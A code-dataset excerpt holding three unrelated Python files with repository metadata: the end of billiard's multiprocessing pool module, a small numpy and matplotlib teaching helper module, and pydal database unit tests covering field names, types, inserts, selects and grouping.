if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from billiard.dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
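# Hedged usage sketch (editor's addition, not part of the original billiard
# source): a minimal demonstration of the Pool API defined above. ThreadPool
# is used because it sidesteps pickling concerns, and the __main__ guard keeps
# module import free of side effects.
if __name__ == '__main__':
    with ThreadPool(processes=2) as pool:
        # map() blocks until every result is ready and returns them in order.
        print(pool.map(abs, [-1, -2, 3]))  # -> [1, 2, 3]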
|
flaviogrossi/billiard
|
billiard/pool.py
|
Python
|
bsd-3-clause
| 64,479 | 0 |
# coding: utf-8
# numpy_utils for Intro to Data Science with Python
# Author: Kat Chuang
# Created: Nov 2014
# --------------------------------------
import numpy
## Stage 2 begin
fieldNames = ['', 'id', 'priceLabel', 'name','brandId', 'brandName', 'imageLink',
'desc', 'vendor', 'patterned', 'material']
dataTypes = [('myint', 'i'), ('myid', 'i'), ('price', 'f8'), ('name', 'a200'),
('brandId', '<i8'), ('brandName', 'a200'), ('imageUrl', '|S500'),
('description', '|S900'), ('vendor', '|S100'), ('pattern', '|S50'), ('material', '|S50'), ]
def load_data(filename):
my_csv = numpy.genfromtxt(filename, delimiter='\t', skip_header=1,
names=fieldNames, invalid_raise=False,
dtype=dataTypes)
return my_csv
#2.a count
def size(my_csv):
print("Length (numpy): {}".format(my_csv.size))
#2.b sum
def calculate_numpy_sum(my_field):
field_in_float = [float(item) for item in my_field]
total = numpy.sum(field_in_float)
return total
#2.c mean
def find_numpy_average(my_field):
field_in_float = [float(item) for item in my_field]
total = calculate_numpy_sum(field_in_float)
size = len(my_field)
average = total / size
return average
#2.d max, min
def numpy_max(my_field_in_float):
return numpy.amax(my_field_in_float)
def numpy_min(my_field_in_float):
return numpy.amin(my_field_in_float)
## Stage 2 end
# --------------------------------------
## Stage 3 begin
from my_utils import filter_col_by_string, filter_col_by_float
## Stage 3 end
# --------------------------------------
## Stage 4 begin
from my_utils import write_to_file, write_brand_and_price_to_file
## Stage 4 end
# --------------------------------------
## Stage 5 begin
import matplotlib.pyplot as plt
plt.style.use('ggplot')
def plot_all_bars(prices_in_float, exported_figure_filename):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
prices = list(map(int, prices_in_float))
X = numpy.arange(len(prices))
width = 0.25
ax.bar(X+width, prices, width)
ax.set_xlim([0, 5055])
fig.savefig(exported_figure_filename)
def create_chart_for_embed(sample, title):
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
plt.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
def export_chart(sample, title):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
ax.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
ax.set_title(title)
ax.set_xlabel(title)
ax.set_ylabel('Number of Ties')
if len(prices) > 20:
ax.set_xlim([0, round(len(prices), -1)])
else:
ax.set_xlim([0, len(prices)])
fig.savefig('_charts/' + title + '.png')
def prices_of_list(sampleData):
temp_list = []
for row in sampleData[1:]:
priceCol = float(row[2])
temp_list.append(priceCol)
return temp_list
## Stage 5 end
# --------------------------------------
## Stage 6 begin
## Stage 6 end
# --------------------------------------
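# Hedged usage sketch (editor's addition, not part of the original module):
# a typical flow for the helpers above, assuming a tab-separated file named
# "data.tsv" whose columns match fieldNames.
#
#   data = load_data("data.tsv")
#   size(data)                                   # prints the row count
#   prices = prices_of_list(data)                # price column as floats
#   print(calculate_numpy_sum(prices), find_numpy_average(prices))
#   export_chart(prices, "price-distribution")   # writes _charts/price-distribution.png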
|
katychuang/python-data-sci-basics
|
src/numpy_utils.py
|
Python
|
mit
| 3,188 | 0.016311 |
# -*- coding: utf-8 -*-
"""
Basic unit tests
"""
from __future__ import print_function
import os
import glob
import datetime
import json
import pickle
from pydal._compat import basestring, StringIO, integer_types, xrange, BytesIO, to_bytes
from pydal import DAL, Field
from pydal.helpers.classes import SQLALL, OpRow
from pydal.objects import Table, Expression, Row
from ._compat import unittest
from ._adapt import (
DEFAULT_URI,
IS_POSTGRESQL,
IS_SQLITE,
IS_MSSQL,
IS_MYSQL,
IS_TERADATA,
IS_NOSQL,
IS_ORACLE,
)
from ._helpers import DALtest
long = integer_types[-1]
print("Testing against %s engine (%s)" % (DEFAULT_URI.partition(":")[0], DEFAULT_URI))
ALLOWED_DATATYPES = [
"string",
"text",
"integer",
"boolean",
"double",
"blob",
"date",
"time",
"datetime",
"upload",
"password",
"json",
"bigint",
]
def setUpModule():
if IS_MYSQL or IS_TERADATA or IS_ORACLE:
db = DAL(DEFAULT_URI, check_reserved=["all"])
def clean_table(db, tablename):
try:
db.define_table(tablename)
except Exception as e:
pass
try:
db[tablename].drop()
except Exception as e:
pass
for tablename in [
"tt",
"t0",
"t1",
"t2",
"t3",
"t4",
"easy_name",
"tt_archive",
"pet_farm",
"person",
]:
clean_table(db, tablename)
db.close()
def tearDownModule():
if os.path.isfile("sql.log"):
os.unlink("sql.log")
for a in glob.glob("*.table"):
os.unlink(a)
class TestFields(DALtest):
def testFieldName(self):
"""
- a "str" something
- not a method or property of Table
- "dotted-notation" friendly:
- a valid python identifier
- not a python keyword
- not starting with underscore or an integer
- not containing dots
Basically, anything alphanumeric, no symbols, only underscore as
punctuation
"""
# Check that Fields cannot start with underscores
self.assertRaises(SyntaxError, Field, "_abc", "string")
# Check that Fields cannot contain punctuation other than underscores
self.assertRaises(SyntaxError, Field, "a.bc", "string")
# Check that Fields cannot be a name of a method or property of Table
for x in ["drop", "on", "truncate"]:
self.assertRaises(SyntaxError, Field, x, "string")
# Check that Fields allows underscores in the body of a field name.
self.assertTrue(
Field("a_bc", "string"),
"Field isn't allowing underscores in fieldnames. It should.",
)
# Check that Field names don't allow a python keyword
self.assertRaises(SyntaxError, Field, "True", "string")
self.assertRaises(SyntaxError, Field, "elif", "string")
self.assertRaises(SyntaxError, Field, "while", "string")
# Check that Field names don't allow a non-valid python identifier
non_valid_examples = ["1x", "xx$%@%", "xx yy", "yy\na", "yy\n"]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Field, a, "string")
# Check that Field names don't allow a unicode string
        non_valid_examples = [
"ℙƴ☂ℌøἤ",
u"ℙƴ☂ℌøἤ",
u"àè",
u"ṧøмℯ",
u"тεṧт",
u"♥αłüℯṧ",
u"ℊεᾔ℮яαт℮∂",
u"♭ƴ",
u"ᾔ☤ρℌℓ☺ḓ",
]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Field, a, "string")
def testFieldTypes(self):
        # Check that string and password default length is 512
for typ in ["string", "password"]:
self.assertTrue(
Field("abc", typ).length == 512,
"Default length for type '%s' is not 512 or 255" % typ,
)
# Check that upload default length is 512
self.assertTrue(
Field("abc", "upload").length == 512,
"Default length for type 'upload' is not 512",
)
# Check that Tables passed in the type creates a reference
self.assertTrue(
Field("abc", Table(None, "temp")).type == "reference temp",
"Passing a Table does not result in a reference type.",
)
def testFieldLabels(self):
# Check that a label is successfully built from the supplied fieldname
self.assertTrue(
Field("abc", "string").label == "Abc", "Label built is incorrect"
)
self.assertTrue(
Field("abc_def", "string").label == "Abc Def", "Label built is incorrect"
)
def testFieldFormatters(self): # Formatter should be called Validator
# Test the default formatters
for typ in ALLOWED_DATATYPES:
f = Field("abc", typ)
if typ not in ["date", "time", "datetime"]:
isinstance(f.formatter("test"), str)
else:
isinstance(f.formatter(datetime.datetime.now()), str)
def testUploadField(self):
import tempfile
stream = tempfile.NamedTemporaryFile()
content = b"this is the stream content"
stream.write(content)
# rewind before inserting
stream.seek(0)
db = self.connect()
db.define_table(
"tt",
Field(
"fileobj", "upload", uploadfolder=tempfile.gettempdir(), autodelete=True
),
)
f_id = db.tt.insert(fileobj=stream)
row = db.tt[f_id]
(retr_name, retr_stream) = db.tt.fileobj.retrieve(row.fileobj)
# name should be the same
self.assertEqual(retr_name, os.path.basename(stream.name))
# content should be the same
retr_content = retr_stream.read()
self.assertEqual(retr_content, content)
# close streams!
retr_stream.close()
# delete
row.delete_record()
# drop
db.tt.drop()
# this part is triggered only if fs (AKA pyfilesystem) module is installed
try:
from fs.memoryfs import MemoryFS
# rewind before inserting
stream.seek(0)
db.define_table(
"tt", Field("fileobj", "upload", uploadfs=MemoryFS(), autodelete=True)
)
f_id = db.tt.insert(fileobj=stream)
row = db.tt[f_id]
(retr_name, retr_stream) = db.tt.fileobj.retrieve(row.fileobj)
# name should be the same
self.assertEqual(retr_name, os.path.basename(stream.name))
# content should be the same
retr_content = retr_stream.read()
self.assertEqual(retr_content, content)
# close streams
retr_stream.close()
stream.close()
# delete
row.delete_record()
# drop
db.tt.drop()
except ImportError:
pass
def testBlobBytes(self):
# Test blob with latin1 encoded bytes
db = self.connect()
obj = pickle.dumps("0")
db.define_table("tt", Field("aa", "blob"))
self.assertEqual(db.tt.insert(aa=obj), 1)
self.assertEqual(to_bytes(db().select(db.tt.aa)[0].aa), obj)
self.assertEqual(db.tt[1].aa, obj)
self.assertEqual(BytesIO(to_bytes(db.tt[1].aa)).read(), obj)
db.tt.drop()
def testRun(self):
# Test all field types and their return values
db = self.connect()
for ft in ["string", "text", "password", "upload", "blob"]:
db.define_table("tt", Field("aa", ft, default=""))
self.assertEqual(db.tt.insert(aa="ö"), 1)
if not (IS_ORACLE and (ft == "text" or ft == "blob")):
# only verify insert for LOB types in oracle;
# select may create seg fault in test env
self.assertEqual(db().select(db.tt.aa)[0].aa, "ö")
db.tt.drop()
db.define_table("tt", Field("aa", "integer", default=1))
self.assertEqual(db.tt.insert(aa=3), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3)
db.tt.drop()
db.define_table("tt", Field("aa", "string"))
ucs = "A\xc3\xa9 A"
self.assertEqual(db.tt.insert(aa=ucs), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, ucs)
self.assertEqual(db().select(db.tt.aa.with_alias("zz"))[0].zz, ucs)
db.tt.drop()
db.define_table("tt", Field("aa", "double", default=1))
self.assertEqual(db.tt.insert(aa=3.1), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3.1)
db.tt.drop()
db.define_table("tt", Field("aa", "boolean", default=True))
self.assertEqual(db.tt.insert(aa=True), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, True)
db.tt.drop()
db.define_table("tt", Field("aa", "json", default={}))
# test different python objects for correct serialization in json
objs = [
{"a": 1, "b": 2},
[1, 2, 3],
"abc",
True,
False,
None,
11,
14.3,
long(11),
]
for obj in objs:
rtn_id = db.tt.insert(aa=obj)
rtn = db(db.tt.id == rtn_id).select().first().aa
self.assertEqual(obj, rtn)
db.tt.drop()
db.define_table("tt", Field("aa", "date", default=datetime.date.today()))
t0 = datetime.date.today()
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
db.define_table(
"tt", Field("aa", "datetime", default=datetime.datetime.today())
)
t0 = datetime.datetime(
1971,
12,
21,
10,
30,
55,
0,
)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
## Row APIs
row = db().select(db.tt.aa)[0]
self.assertEqual(db.tt[1].aa, t0)
self.assertEqual(db.tt["aa"], db.tt.aa)
self.assertEqual(db.tt(1).aa, t0)
self.assertTrue(db.tt(1, aa=None) == None)
self.assertFalse(db.tt(1, aa=t0) == None)
self.assertEqual(row.aa, t0)
self.assertEqual(row["aa"], t0)
self.assertEqual(row["tt.aa"], t0)
self.assertEqual(row("tt.aa"), t0)
## Lazy and Virtual fields
db.tt.b = Field.Virtual(lambda row: row.tt.aa)
# test for FieldVirtual.bind
self.assertEqual(db.tt.b.tablename, "tt")
self.assertEqual(db.tt.b.name, "b")
db.tt.c = Field.Lazy(lambda row: row.tt.aa)
# test for FieldMethod.bind
self.assertEqual(db.tt.c.name, "c")
rows = db().select(db.tt.aa)
row = rows[0]
self.assertEqual(row.b, t0)
self.assertEqual(row.c(), t0)
# test for BasicRows.colnames_fields
rows.colnames.insert(0, "tt.b")
rows.colnames.insert(1, "tt.c")
colnames_fields = rows.colnames_fields
self.assertIs(colnames_fields[0], db.tt.b)
self.assertIs(colnames_fields[1], db.tt.c)
db.tt.drop()
if not IS_ORACLE:
db.define_table("tt", Field("aa", "time", default="11:30"))
t0 = datetime.time(10, 30, 55)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
# aggregation type detection
db.define_table(
"tt", Field("aa", "datetime", default=datetime.datetime.today())
)
t0 = datetime.datetime(1971, 12, 21, 10, 30, 55, 0)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa.min())[0][db.tt.aa.min()], t0)
db.tt.drop()
class TestTables(unittest.TestCase):
def testTableNames(self):
"""
- a "str" something
- not a method or property of DAL
- "dotted-notation" friendly:
- a valid python identifier
- not a python keyword
- not starting with underscore or an integer
- not containing dots
Basically, anything alphanumeric, no symbols, only underscore as
punctuation
"""
# Check that Tables cannot start with underscores
self.assertRaises(SyntaxError, Table, None, "_abc")
# Check that Tables cannot contain punctuation other than underscores
self.assertRaises(SyntaxError, Table, None, "a.bc")
# Check that Tables cannot be a name of a method or property of DAL
for x in ["define_table", "tables", "as_dict"]:
self.assertRaises(SyntaxError, Table, None, x)
# Check that Table allows underscores in the body of a table name.
self.assertTrue(
Table(None, "a_bc"),
"Table isn't allowing underscores in tablename. It should.",
)
# Check that Table names don't allow a python keyword
self.assertRaises(SyntaxError, Table, None, "True")
self.assertRaises(SyntaxError, Table, None, "elif")
self.assertRaises(SyntaxError, Table, None, "while")
# Check that Table names don't allow a non-valid python identifier
non_valid_examples = ["1x", "xx$%@%", "xx yy", "yy\na", "yy\n"]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Table, None, a)
# Check that Table names don't allow non-ASCII unicode strings
non_valid_examples = [
"ℙƴ☂ℌøἤ",
u"ℙƴ☂ℌøἤ",
u"àè",
u"ṧøмℯ",
u"тεṧт",
u"♥αłüℯṧ",
u"ℊεᾔ℮яαт℮∂",
u"♭ƴ",
u"ᾔ☤ρℌℓ☺ḓ",
]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Table, None, a)
class TestAll(unittest.TestCase):
def setUp(self):
self.pt = Table(None, "PseudoTable", Field("name"), Field("birthdate"))
def testSQLALL(self):
ans = "PseudoTable.id, PseudoTable.name, PseudoTable.birthdate"
self.assertEqual(str(SQLALL(self.pt)), ans)
class TestTable(DALtest):
def testTableCreation(self):
# Check for error when passing a type other than Field or Table
self.assertRaises(SyntaxError, Table, None, "test", None)
persons = Table(
None, "persons", Field("firstname", "string"), Field("lastname", "string")
)
# Does it have the correct fields?
self.assertTrue(set(persons.fields).issuperset(set(["firstname", "lastname"])))
# ALL is set correctly
self.assertTrue("persons.firstname, persons.lastname" in str(persons.ALL))
def testTableAlias(self):
db = self.connect()
persons = Table(
db, "persons", Field("firstname", "string"), Field("lastname", "string")
)
aliens = persons.with_alias("aliens")
# Alias and original are different table instances with the same fields
self.assertTrue(persons is not aliens)
self.assertTrue(set(persons.fields) == set(aliens.fields))
def testTableInheritance(self):
persons = Table(
None, "persons", Field("firstname", "string"), Field("lastname", "string")
)
customers = Table(
None, "customers", Field("items_purchased", "integer"), persons
)
self.assertTrue(
set(customers.fields).issuperset(
set(["items_purchased", "firstname", "lastname"])
)
)
class TestInsert(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
else:
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db(db.tt.aa == "1").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
self.assertEqual(db(db.tt.aa == "1").update(aa="2"), 3)
self.assertEqual(db(db.tt.aa == "2").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), False)
self.assertEqual(db(db.tt.aa == "2").delete(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
class TestSelect(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="2"), 2)
self.assertEqual(db.tt.insert(aa="3"), 3)
else:
self.assertEqual(db.tt.insert(aa="2"), 1)
self.assertEqual(db.tt.insert(aa="3"), 1)
self.assertEqual(db(db.tt.id > 0).count(), 3)
self.assertEqual(
db(db.tt.id > 0).select(orderby=~db.tt.aa | db.tt.id)[0].aa, "3"
)
self.assertEqual(len(db(db.tt.id > 0).select(limitby=(1, 2))), 1)
self.assertEqual(db(db.tt.id > 0).select(limitby=(1, 2))[0].aa, "2")
self.assertEqual(len(db().select(db.tt.ALL)), 3)
self.assertEqual(db(db.tt.aa == None).count(), 0)
self.assertEqual(db(db.tt.aa != None).count(), 3)
self.assertEqual(db(db.tt.aa > "1").count(), 2)
self.assertEqual(db(db.tt.aa >= "1").count(), 3)
self.assertEqual(db(db.tt.aa == "1").count(), 1)
self.assertEqual(db(db.tt.aa != "1").count(), 2)
self.assertEqual(db(db.tt.aa < "3").count(), 2)
self.assertEqual(db(db.tt.aa <= "3").count(), 3)
self.assertEqual(db(db.tt.aa > "1")(db.tt.aa < "3").count(), 1)
self.assertEqual(db((db.tt.aa > "1") & (db.tt.aa < "3")).count(), 1)
self.assertEqual(db((db.tt.aa > "1") | (db.tt.aa < "3")).count(), 3)
self.assertEqual(db((db.tt.aa > "1") & ~(db.tt.aa > "2")).count(), 1)
self.assertEqual(db(~(db.tt.aa > "1") & (db.tt.aa > "2")).count(), 0)
# Test for REGEX_TABLE_DOT_FIELD: a "table.field" string is resolved to the actual Field
self.assertEqual(db(db.tt).select("tt.aa").first()[db.tt.aa], "1")
def testTestQuery(self):
db = self.connect()
db._adapter.test_connection()
def testListInteger(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:integer"))
l = [1, 2, 3, 4, 5]
db.tt.insert(aa=l)
self.assertEqual(db(db.tt).select("tt.aa").first()[db.tt.aa], l)
def testListString(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:string"))
l = ["a", "b", "c"]
db.tt.insert(aa=l)
self.assertEqual(db(db.tt).select("tt.aa").first()[db.tt.aa], l)
def testListReference(self):
db = self.connect()
db.define_table("t0", Field("aa", "string"))
db.define_table("tt", Field("t0_id", "list:reference t0"))
id_a1 = db.t0.insert(aa="test1")
id_a2 = db.t0.insert(aa="test2")
ref1 = [id_a1]
ref2 = [id_a2]
ref3 = [id_a1, id_a2]
db.tt.insert(t0_id=ref1)
self.assertEqual(db(db.tt).select(db.tt.t0_id).last()[db.tt.t0_id], ref1)
db.tt.insert(t0_id=ref2)
self.assertEqual(db(db.tt).select(db.tt.t0_id).last()[db.tt.t0_id], ref2)
db.tt.insert(t0_id=ref3)
self.assertEqual(db(db.tt).select(db.tt.t0_id).last()[db.tt.t0_id], ref3)
self.assertEqual(db(db.tt.t0_id == ref3).count(), 1)
def testGroupByAndDistinct(self):
db = self.connect()
db.define_table(
"tt", Field("aa"), Field("bb", "integer"), Field("cc", "integer")
)
db.tt.insert(aa="4", bb=1, cc=1)
db.tt.insert(aa="3", bb=2, cc=1)
db.tt.insert(aa="3", bb=1, cc=1)
db.tt.insert(aa="1", bb=1, cc=1)
db.tt.insert(aa="1", bb=2, cc=1)
db.tt.insert(aa="1", bb=3, cc=1)
db.tt.insert(aa="1", bb=4, cc=1)
db.tt.insert(aa="2", bb=1, cc=1)
db.tt.insert(aa="2", bb=2, cc=1)
db.tt.insert(aa="2", bb=3, cc=1)
self.assertEqual(db(db.tt).count(), 10)
# test groupby
result = db().select(db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa)
self.assertEqual(len(result), 4)
result = db().select(
db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa, orderby=db.tt.aa
)
self.assertEqual(tuple(result.response[2]), ("3", 3))
result = db().select(
db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa, orderby=~db.tt.aa
)
self.assertEqual(tuple(result.response[1]), ("3", 3))
result = db().select(
db.tt.aa,
db.tt.bb,
db.tt.cc.sum(),
groupby=db.tt.aa | db.tt.bb,
orderby=(db.tt.aa | ~db.tt.bb),
)
self.assertEqual(tuple(result.response[4]), ("2", 3, 1))
result = db().select(
db.tt.aa,
db.tt.bb.sum(),
groupby=db.tt.aa,
orderby=~db.tt.aa,
limitby=(1, 2),
)
self.assertEqual(len(result), 1)
self.assertEqual(tuple(result.response[0]), ("3", 3))
result = db().select(
db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa, orderby=db.tt.aa, limitby=(0, 3)
)
self.assertEqual(len(result), 3)
self.assertEqual(tuple(result.response[2]), ("3", 3))
# test having
self.assertEqual(
len(
db().select(
db.tt.aa,
db.tt.bb.sum(),
groupby=db.tt.aa,
having=db.tt.bb.sum() > 2,
)
),
3,
)
# test distinct
result = db().select(db.tt.aa, db.tt.cc, distinct=True)
self.assertEqual(len(result), 4)
result = db().select(db.tt.cc, distinct=True, groupby=db.tt.cc)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].cc, 1)
result = db().select(db.tt.aa, distinct=True, orderby=~db.tt.aa)
self.assertEqual(result[2].aa, "2")
self.assertEqual(result[1].aa, "3")
result = db().select(
db.tt.aa, db.tt.bb, distinct=True, orderby=(db.tt.aa | ~db.tt.bb)
)
self.assertEqual(tuple(result.response[4]), ("2", 3))
result = db().select(db.tt.aa, distinct=True, orderby=~db.tt.aa, limitby=(1, 2))
self.assertEqual(len(result), 1)
self.assertEqual(result[0].aa, "3")
# test count distinct
db.tt.insert(aa="2", bb=3, cc=1)
self.assertEqual(db(db.tt).count(distinct=db.tt.aa), 4)
self.assertEqual(db(db.tt.aa).count(db.tt.aa), 4)
self.assertEqual(db(db.tt.aa).count(), 11)
count = db.tt.aa.count()
self.assertEqual(db(db.tt).select(count).first()[count], 11)
count = db.tt.aa.count(distinct=True)
sum = db.tt.bb.sum()
result = db(db.tt).select(count, sum)
self.assertEqual(tuple(result.response[0]), (4, 23))
def testCoalesce(self):
db = self.connect()
db.define_table("tt", Field("aa"), Field("bb"), Field("cc"), Field("dd"))
db.tt.insert(aa="xx")
db.tt.insert(aa="xx", bb="yy")
db.tt.insert(aa="xx", bb="yy", cc="zz")
if not IS_ORACLE:
# skipped on Oracle, where the empty string is stored as NULL
db.tt.insert(aa="xx", bb="yy", cc="zz", dd="")
result = db(db.tt).select(db.tt.dd.coalesce(db.tt.cc, db.tt.bb, db.tt.aa))
self.assertEqual(result.response[0][0], "xx")
self.assertEqual(result.response[1][0], "yy")
self.assertEqual(result.response[2][0], "zz")
